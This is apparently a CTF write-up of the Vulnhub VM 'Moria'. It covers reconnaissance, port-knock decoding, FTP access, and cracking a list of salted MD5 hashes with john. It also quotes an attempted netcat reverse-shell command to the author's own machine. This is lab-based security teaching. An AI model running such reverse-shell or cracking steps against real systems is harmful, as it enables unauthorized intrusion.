Vulnhub Walkthrough: Moria

I was asked to test a VM created by a fellow mod of the netsecfocus slack community (netsecfocus.com, netsecfocus.herokuapp.com). Here is a writeup of "Moria" by the ever-so-clever @abatchy!

 

Step 1: Find it.

netdiscover -r 192.168.207.0/24


Nice. Let's do a quick little initial scan with nmap.

nmap -p- 192.168.207.137

 

Ok, let's throw it in a web browser and see what happens

Hmm, nothing here other than this picture. Let's throw dirb at it.

dirb http://192.168.207.137 -w

Browsing to 192.168.207.137/w/h/i/s/p/e/r/ shows a page called the_abyss, which seems to display a random line of dialog. Instead of refreshing it over and over to get the message, I did this:

for i in {1..1000}; do curl http://192.168.207.137/w/h/i/s/p/e/r/the_abyss/ >> ~/abyss.txt; done; sort ~/abyss.txt | uniq

Which returned the following (I believe this has changed to be a little more obvious in the official release):

My first thought was port knocking, so I tried https://github.com/pan0pt1c0n/knock-knock, mostly because of the string "Knock knock", but I didn't have any luck with that. Perhaps I'm not the one who is supposed to be knocking...

tcpdump -vvnn | grep 192.168.207.137 | grep 192.168.207.129

I let this run for a bit and returned to this output (some has been omitted)

Connections from Moria to my Kali box! (I encourage you after rooting it to take a look at the script that does this. It's pretty clever.)

The ports in question are : "77 101 108 108 111 110"

If you plug those numbers into an online decimal to ascii converter - you get "Mellon"

Maybe this is a password, let's check ftp.

Oh look, a username (Balrog). Neat.

(When I first went through this, I saw the Balrog user in the ftp banner, and tried "Mellon" over ssh. It spat out "WRONG GATE" and kicked me off. After this happened I tried to execute a something like this "ssh Balrog@Moria 'nc -e /bin/sh 192.168.207.129 8080'" with no success.)

So I poked around a little bit:

"QlVraKW4fbIkXau9zkAPNGzviT3UKntl" looks fishy, let's check it out.

Cool. Hashes. BUT WAIT! There's more!

A little salt action in sauce. At least he gave us "MD5(MD5(Password).Salt)"

Let's tidy this up a bit...

Balin:c2d8960157fc8540f6d5d66594e165e0$6MAp84
Oin:727a279d913fba677c490102b135e51e$bQkChe
Ori:8c3c3152a5c64ffb683d78efc3520114$HnqeN4
Maeglin:6ba94d6322f53f30aca4f34960203703$e5ad5s
Fundin:c789ec9fae1cd07adfc02930a39486a1$g9Wxv7
Nain:fec21f5c7dcf8e5e54537cfda92df5fe$HCCsxP
Dain:6a113db1fd25c5501ec3a5936d817c29$cC5nTr
Thrain:7db5040c351237e8332bfbba757a1019$h8spZR
Telchar:dd272382909a4f51163c77da6356cc6f$tb9AWe

Saved it as 'mypasswd' and sent it to john...

john -form=dynamic_6 mypasswd

How rude, Maeglin...

Maybe we can finally get a low priv shell!

This is the part where @abatchy (almost) made me cry. I probably spent somewhere between 8-12 hours in this shell. At one point I even made a list of every file on the system in order of creation date to try and see how he did it.

So here's the first thing I did when I logged in:

I poked around in the (empty) .bash_history, and looked through .ssh

I believe the exact thought that went through my head was "Weird that he took the time to generate a private key for Ori when we authenticated with a password. Also weird that the known_hosts file has only localhost in it. Huh, anyways off to try every other thing I can think of."

Oops.

Lessons learned:

1)  Follow through with your suspicions, leave no stone unturned.

2) Privilege escalation is a massive topic.

and of course

3) Try harder!

 

Thank you so much @abatchy for letting me test this VM! You made something super cool and I hope to work with you more in the future!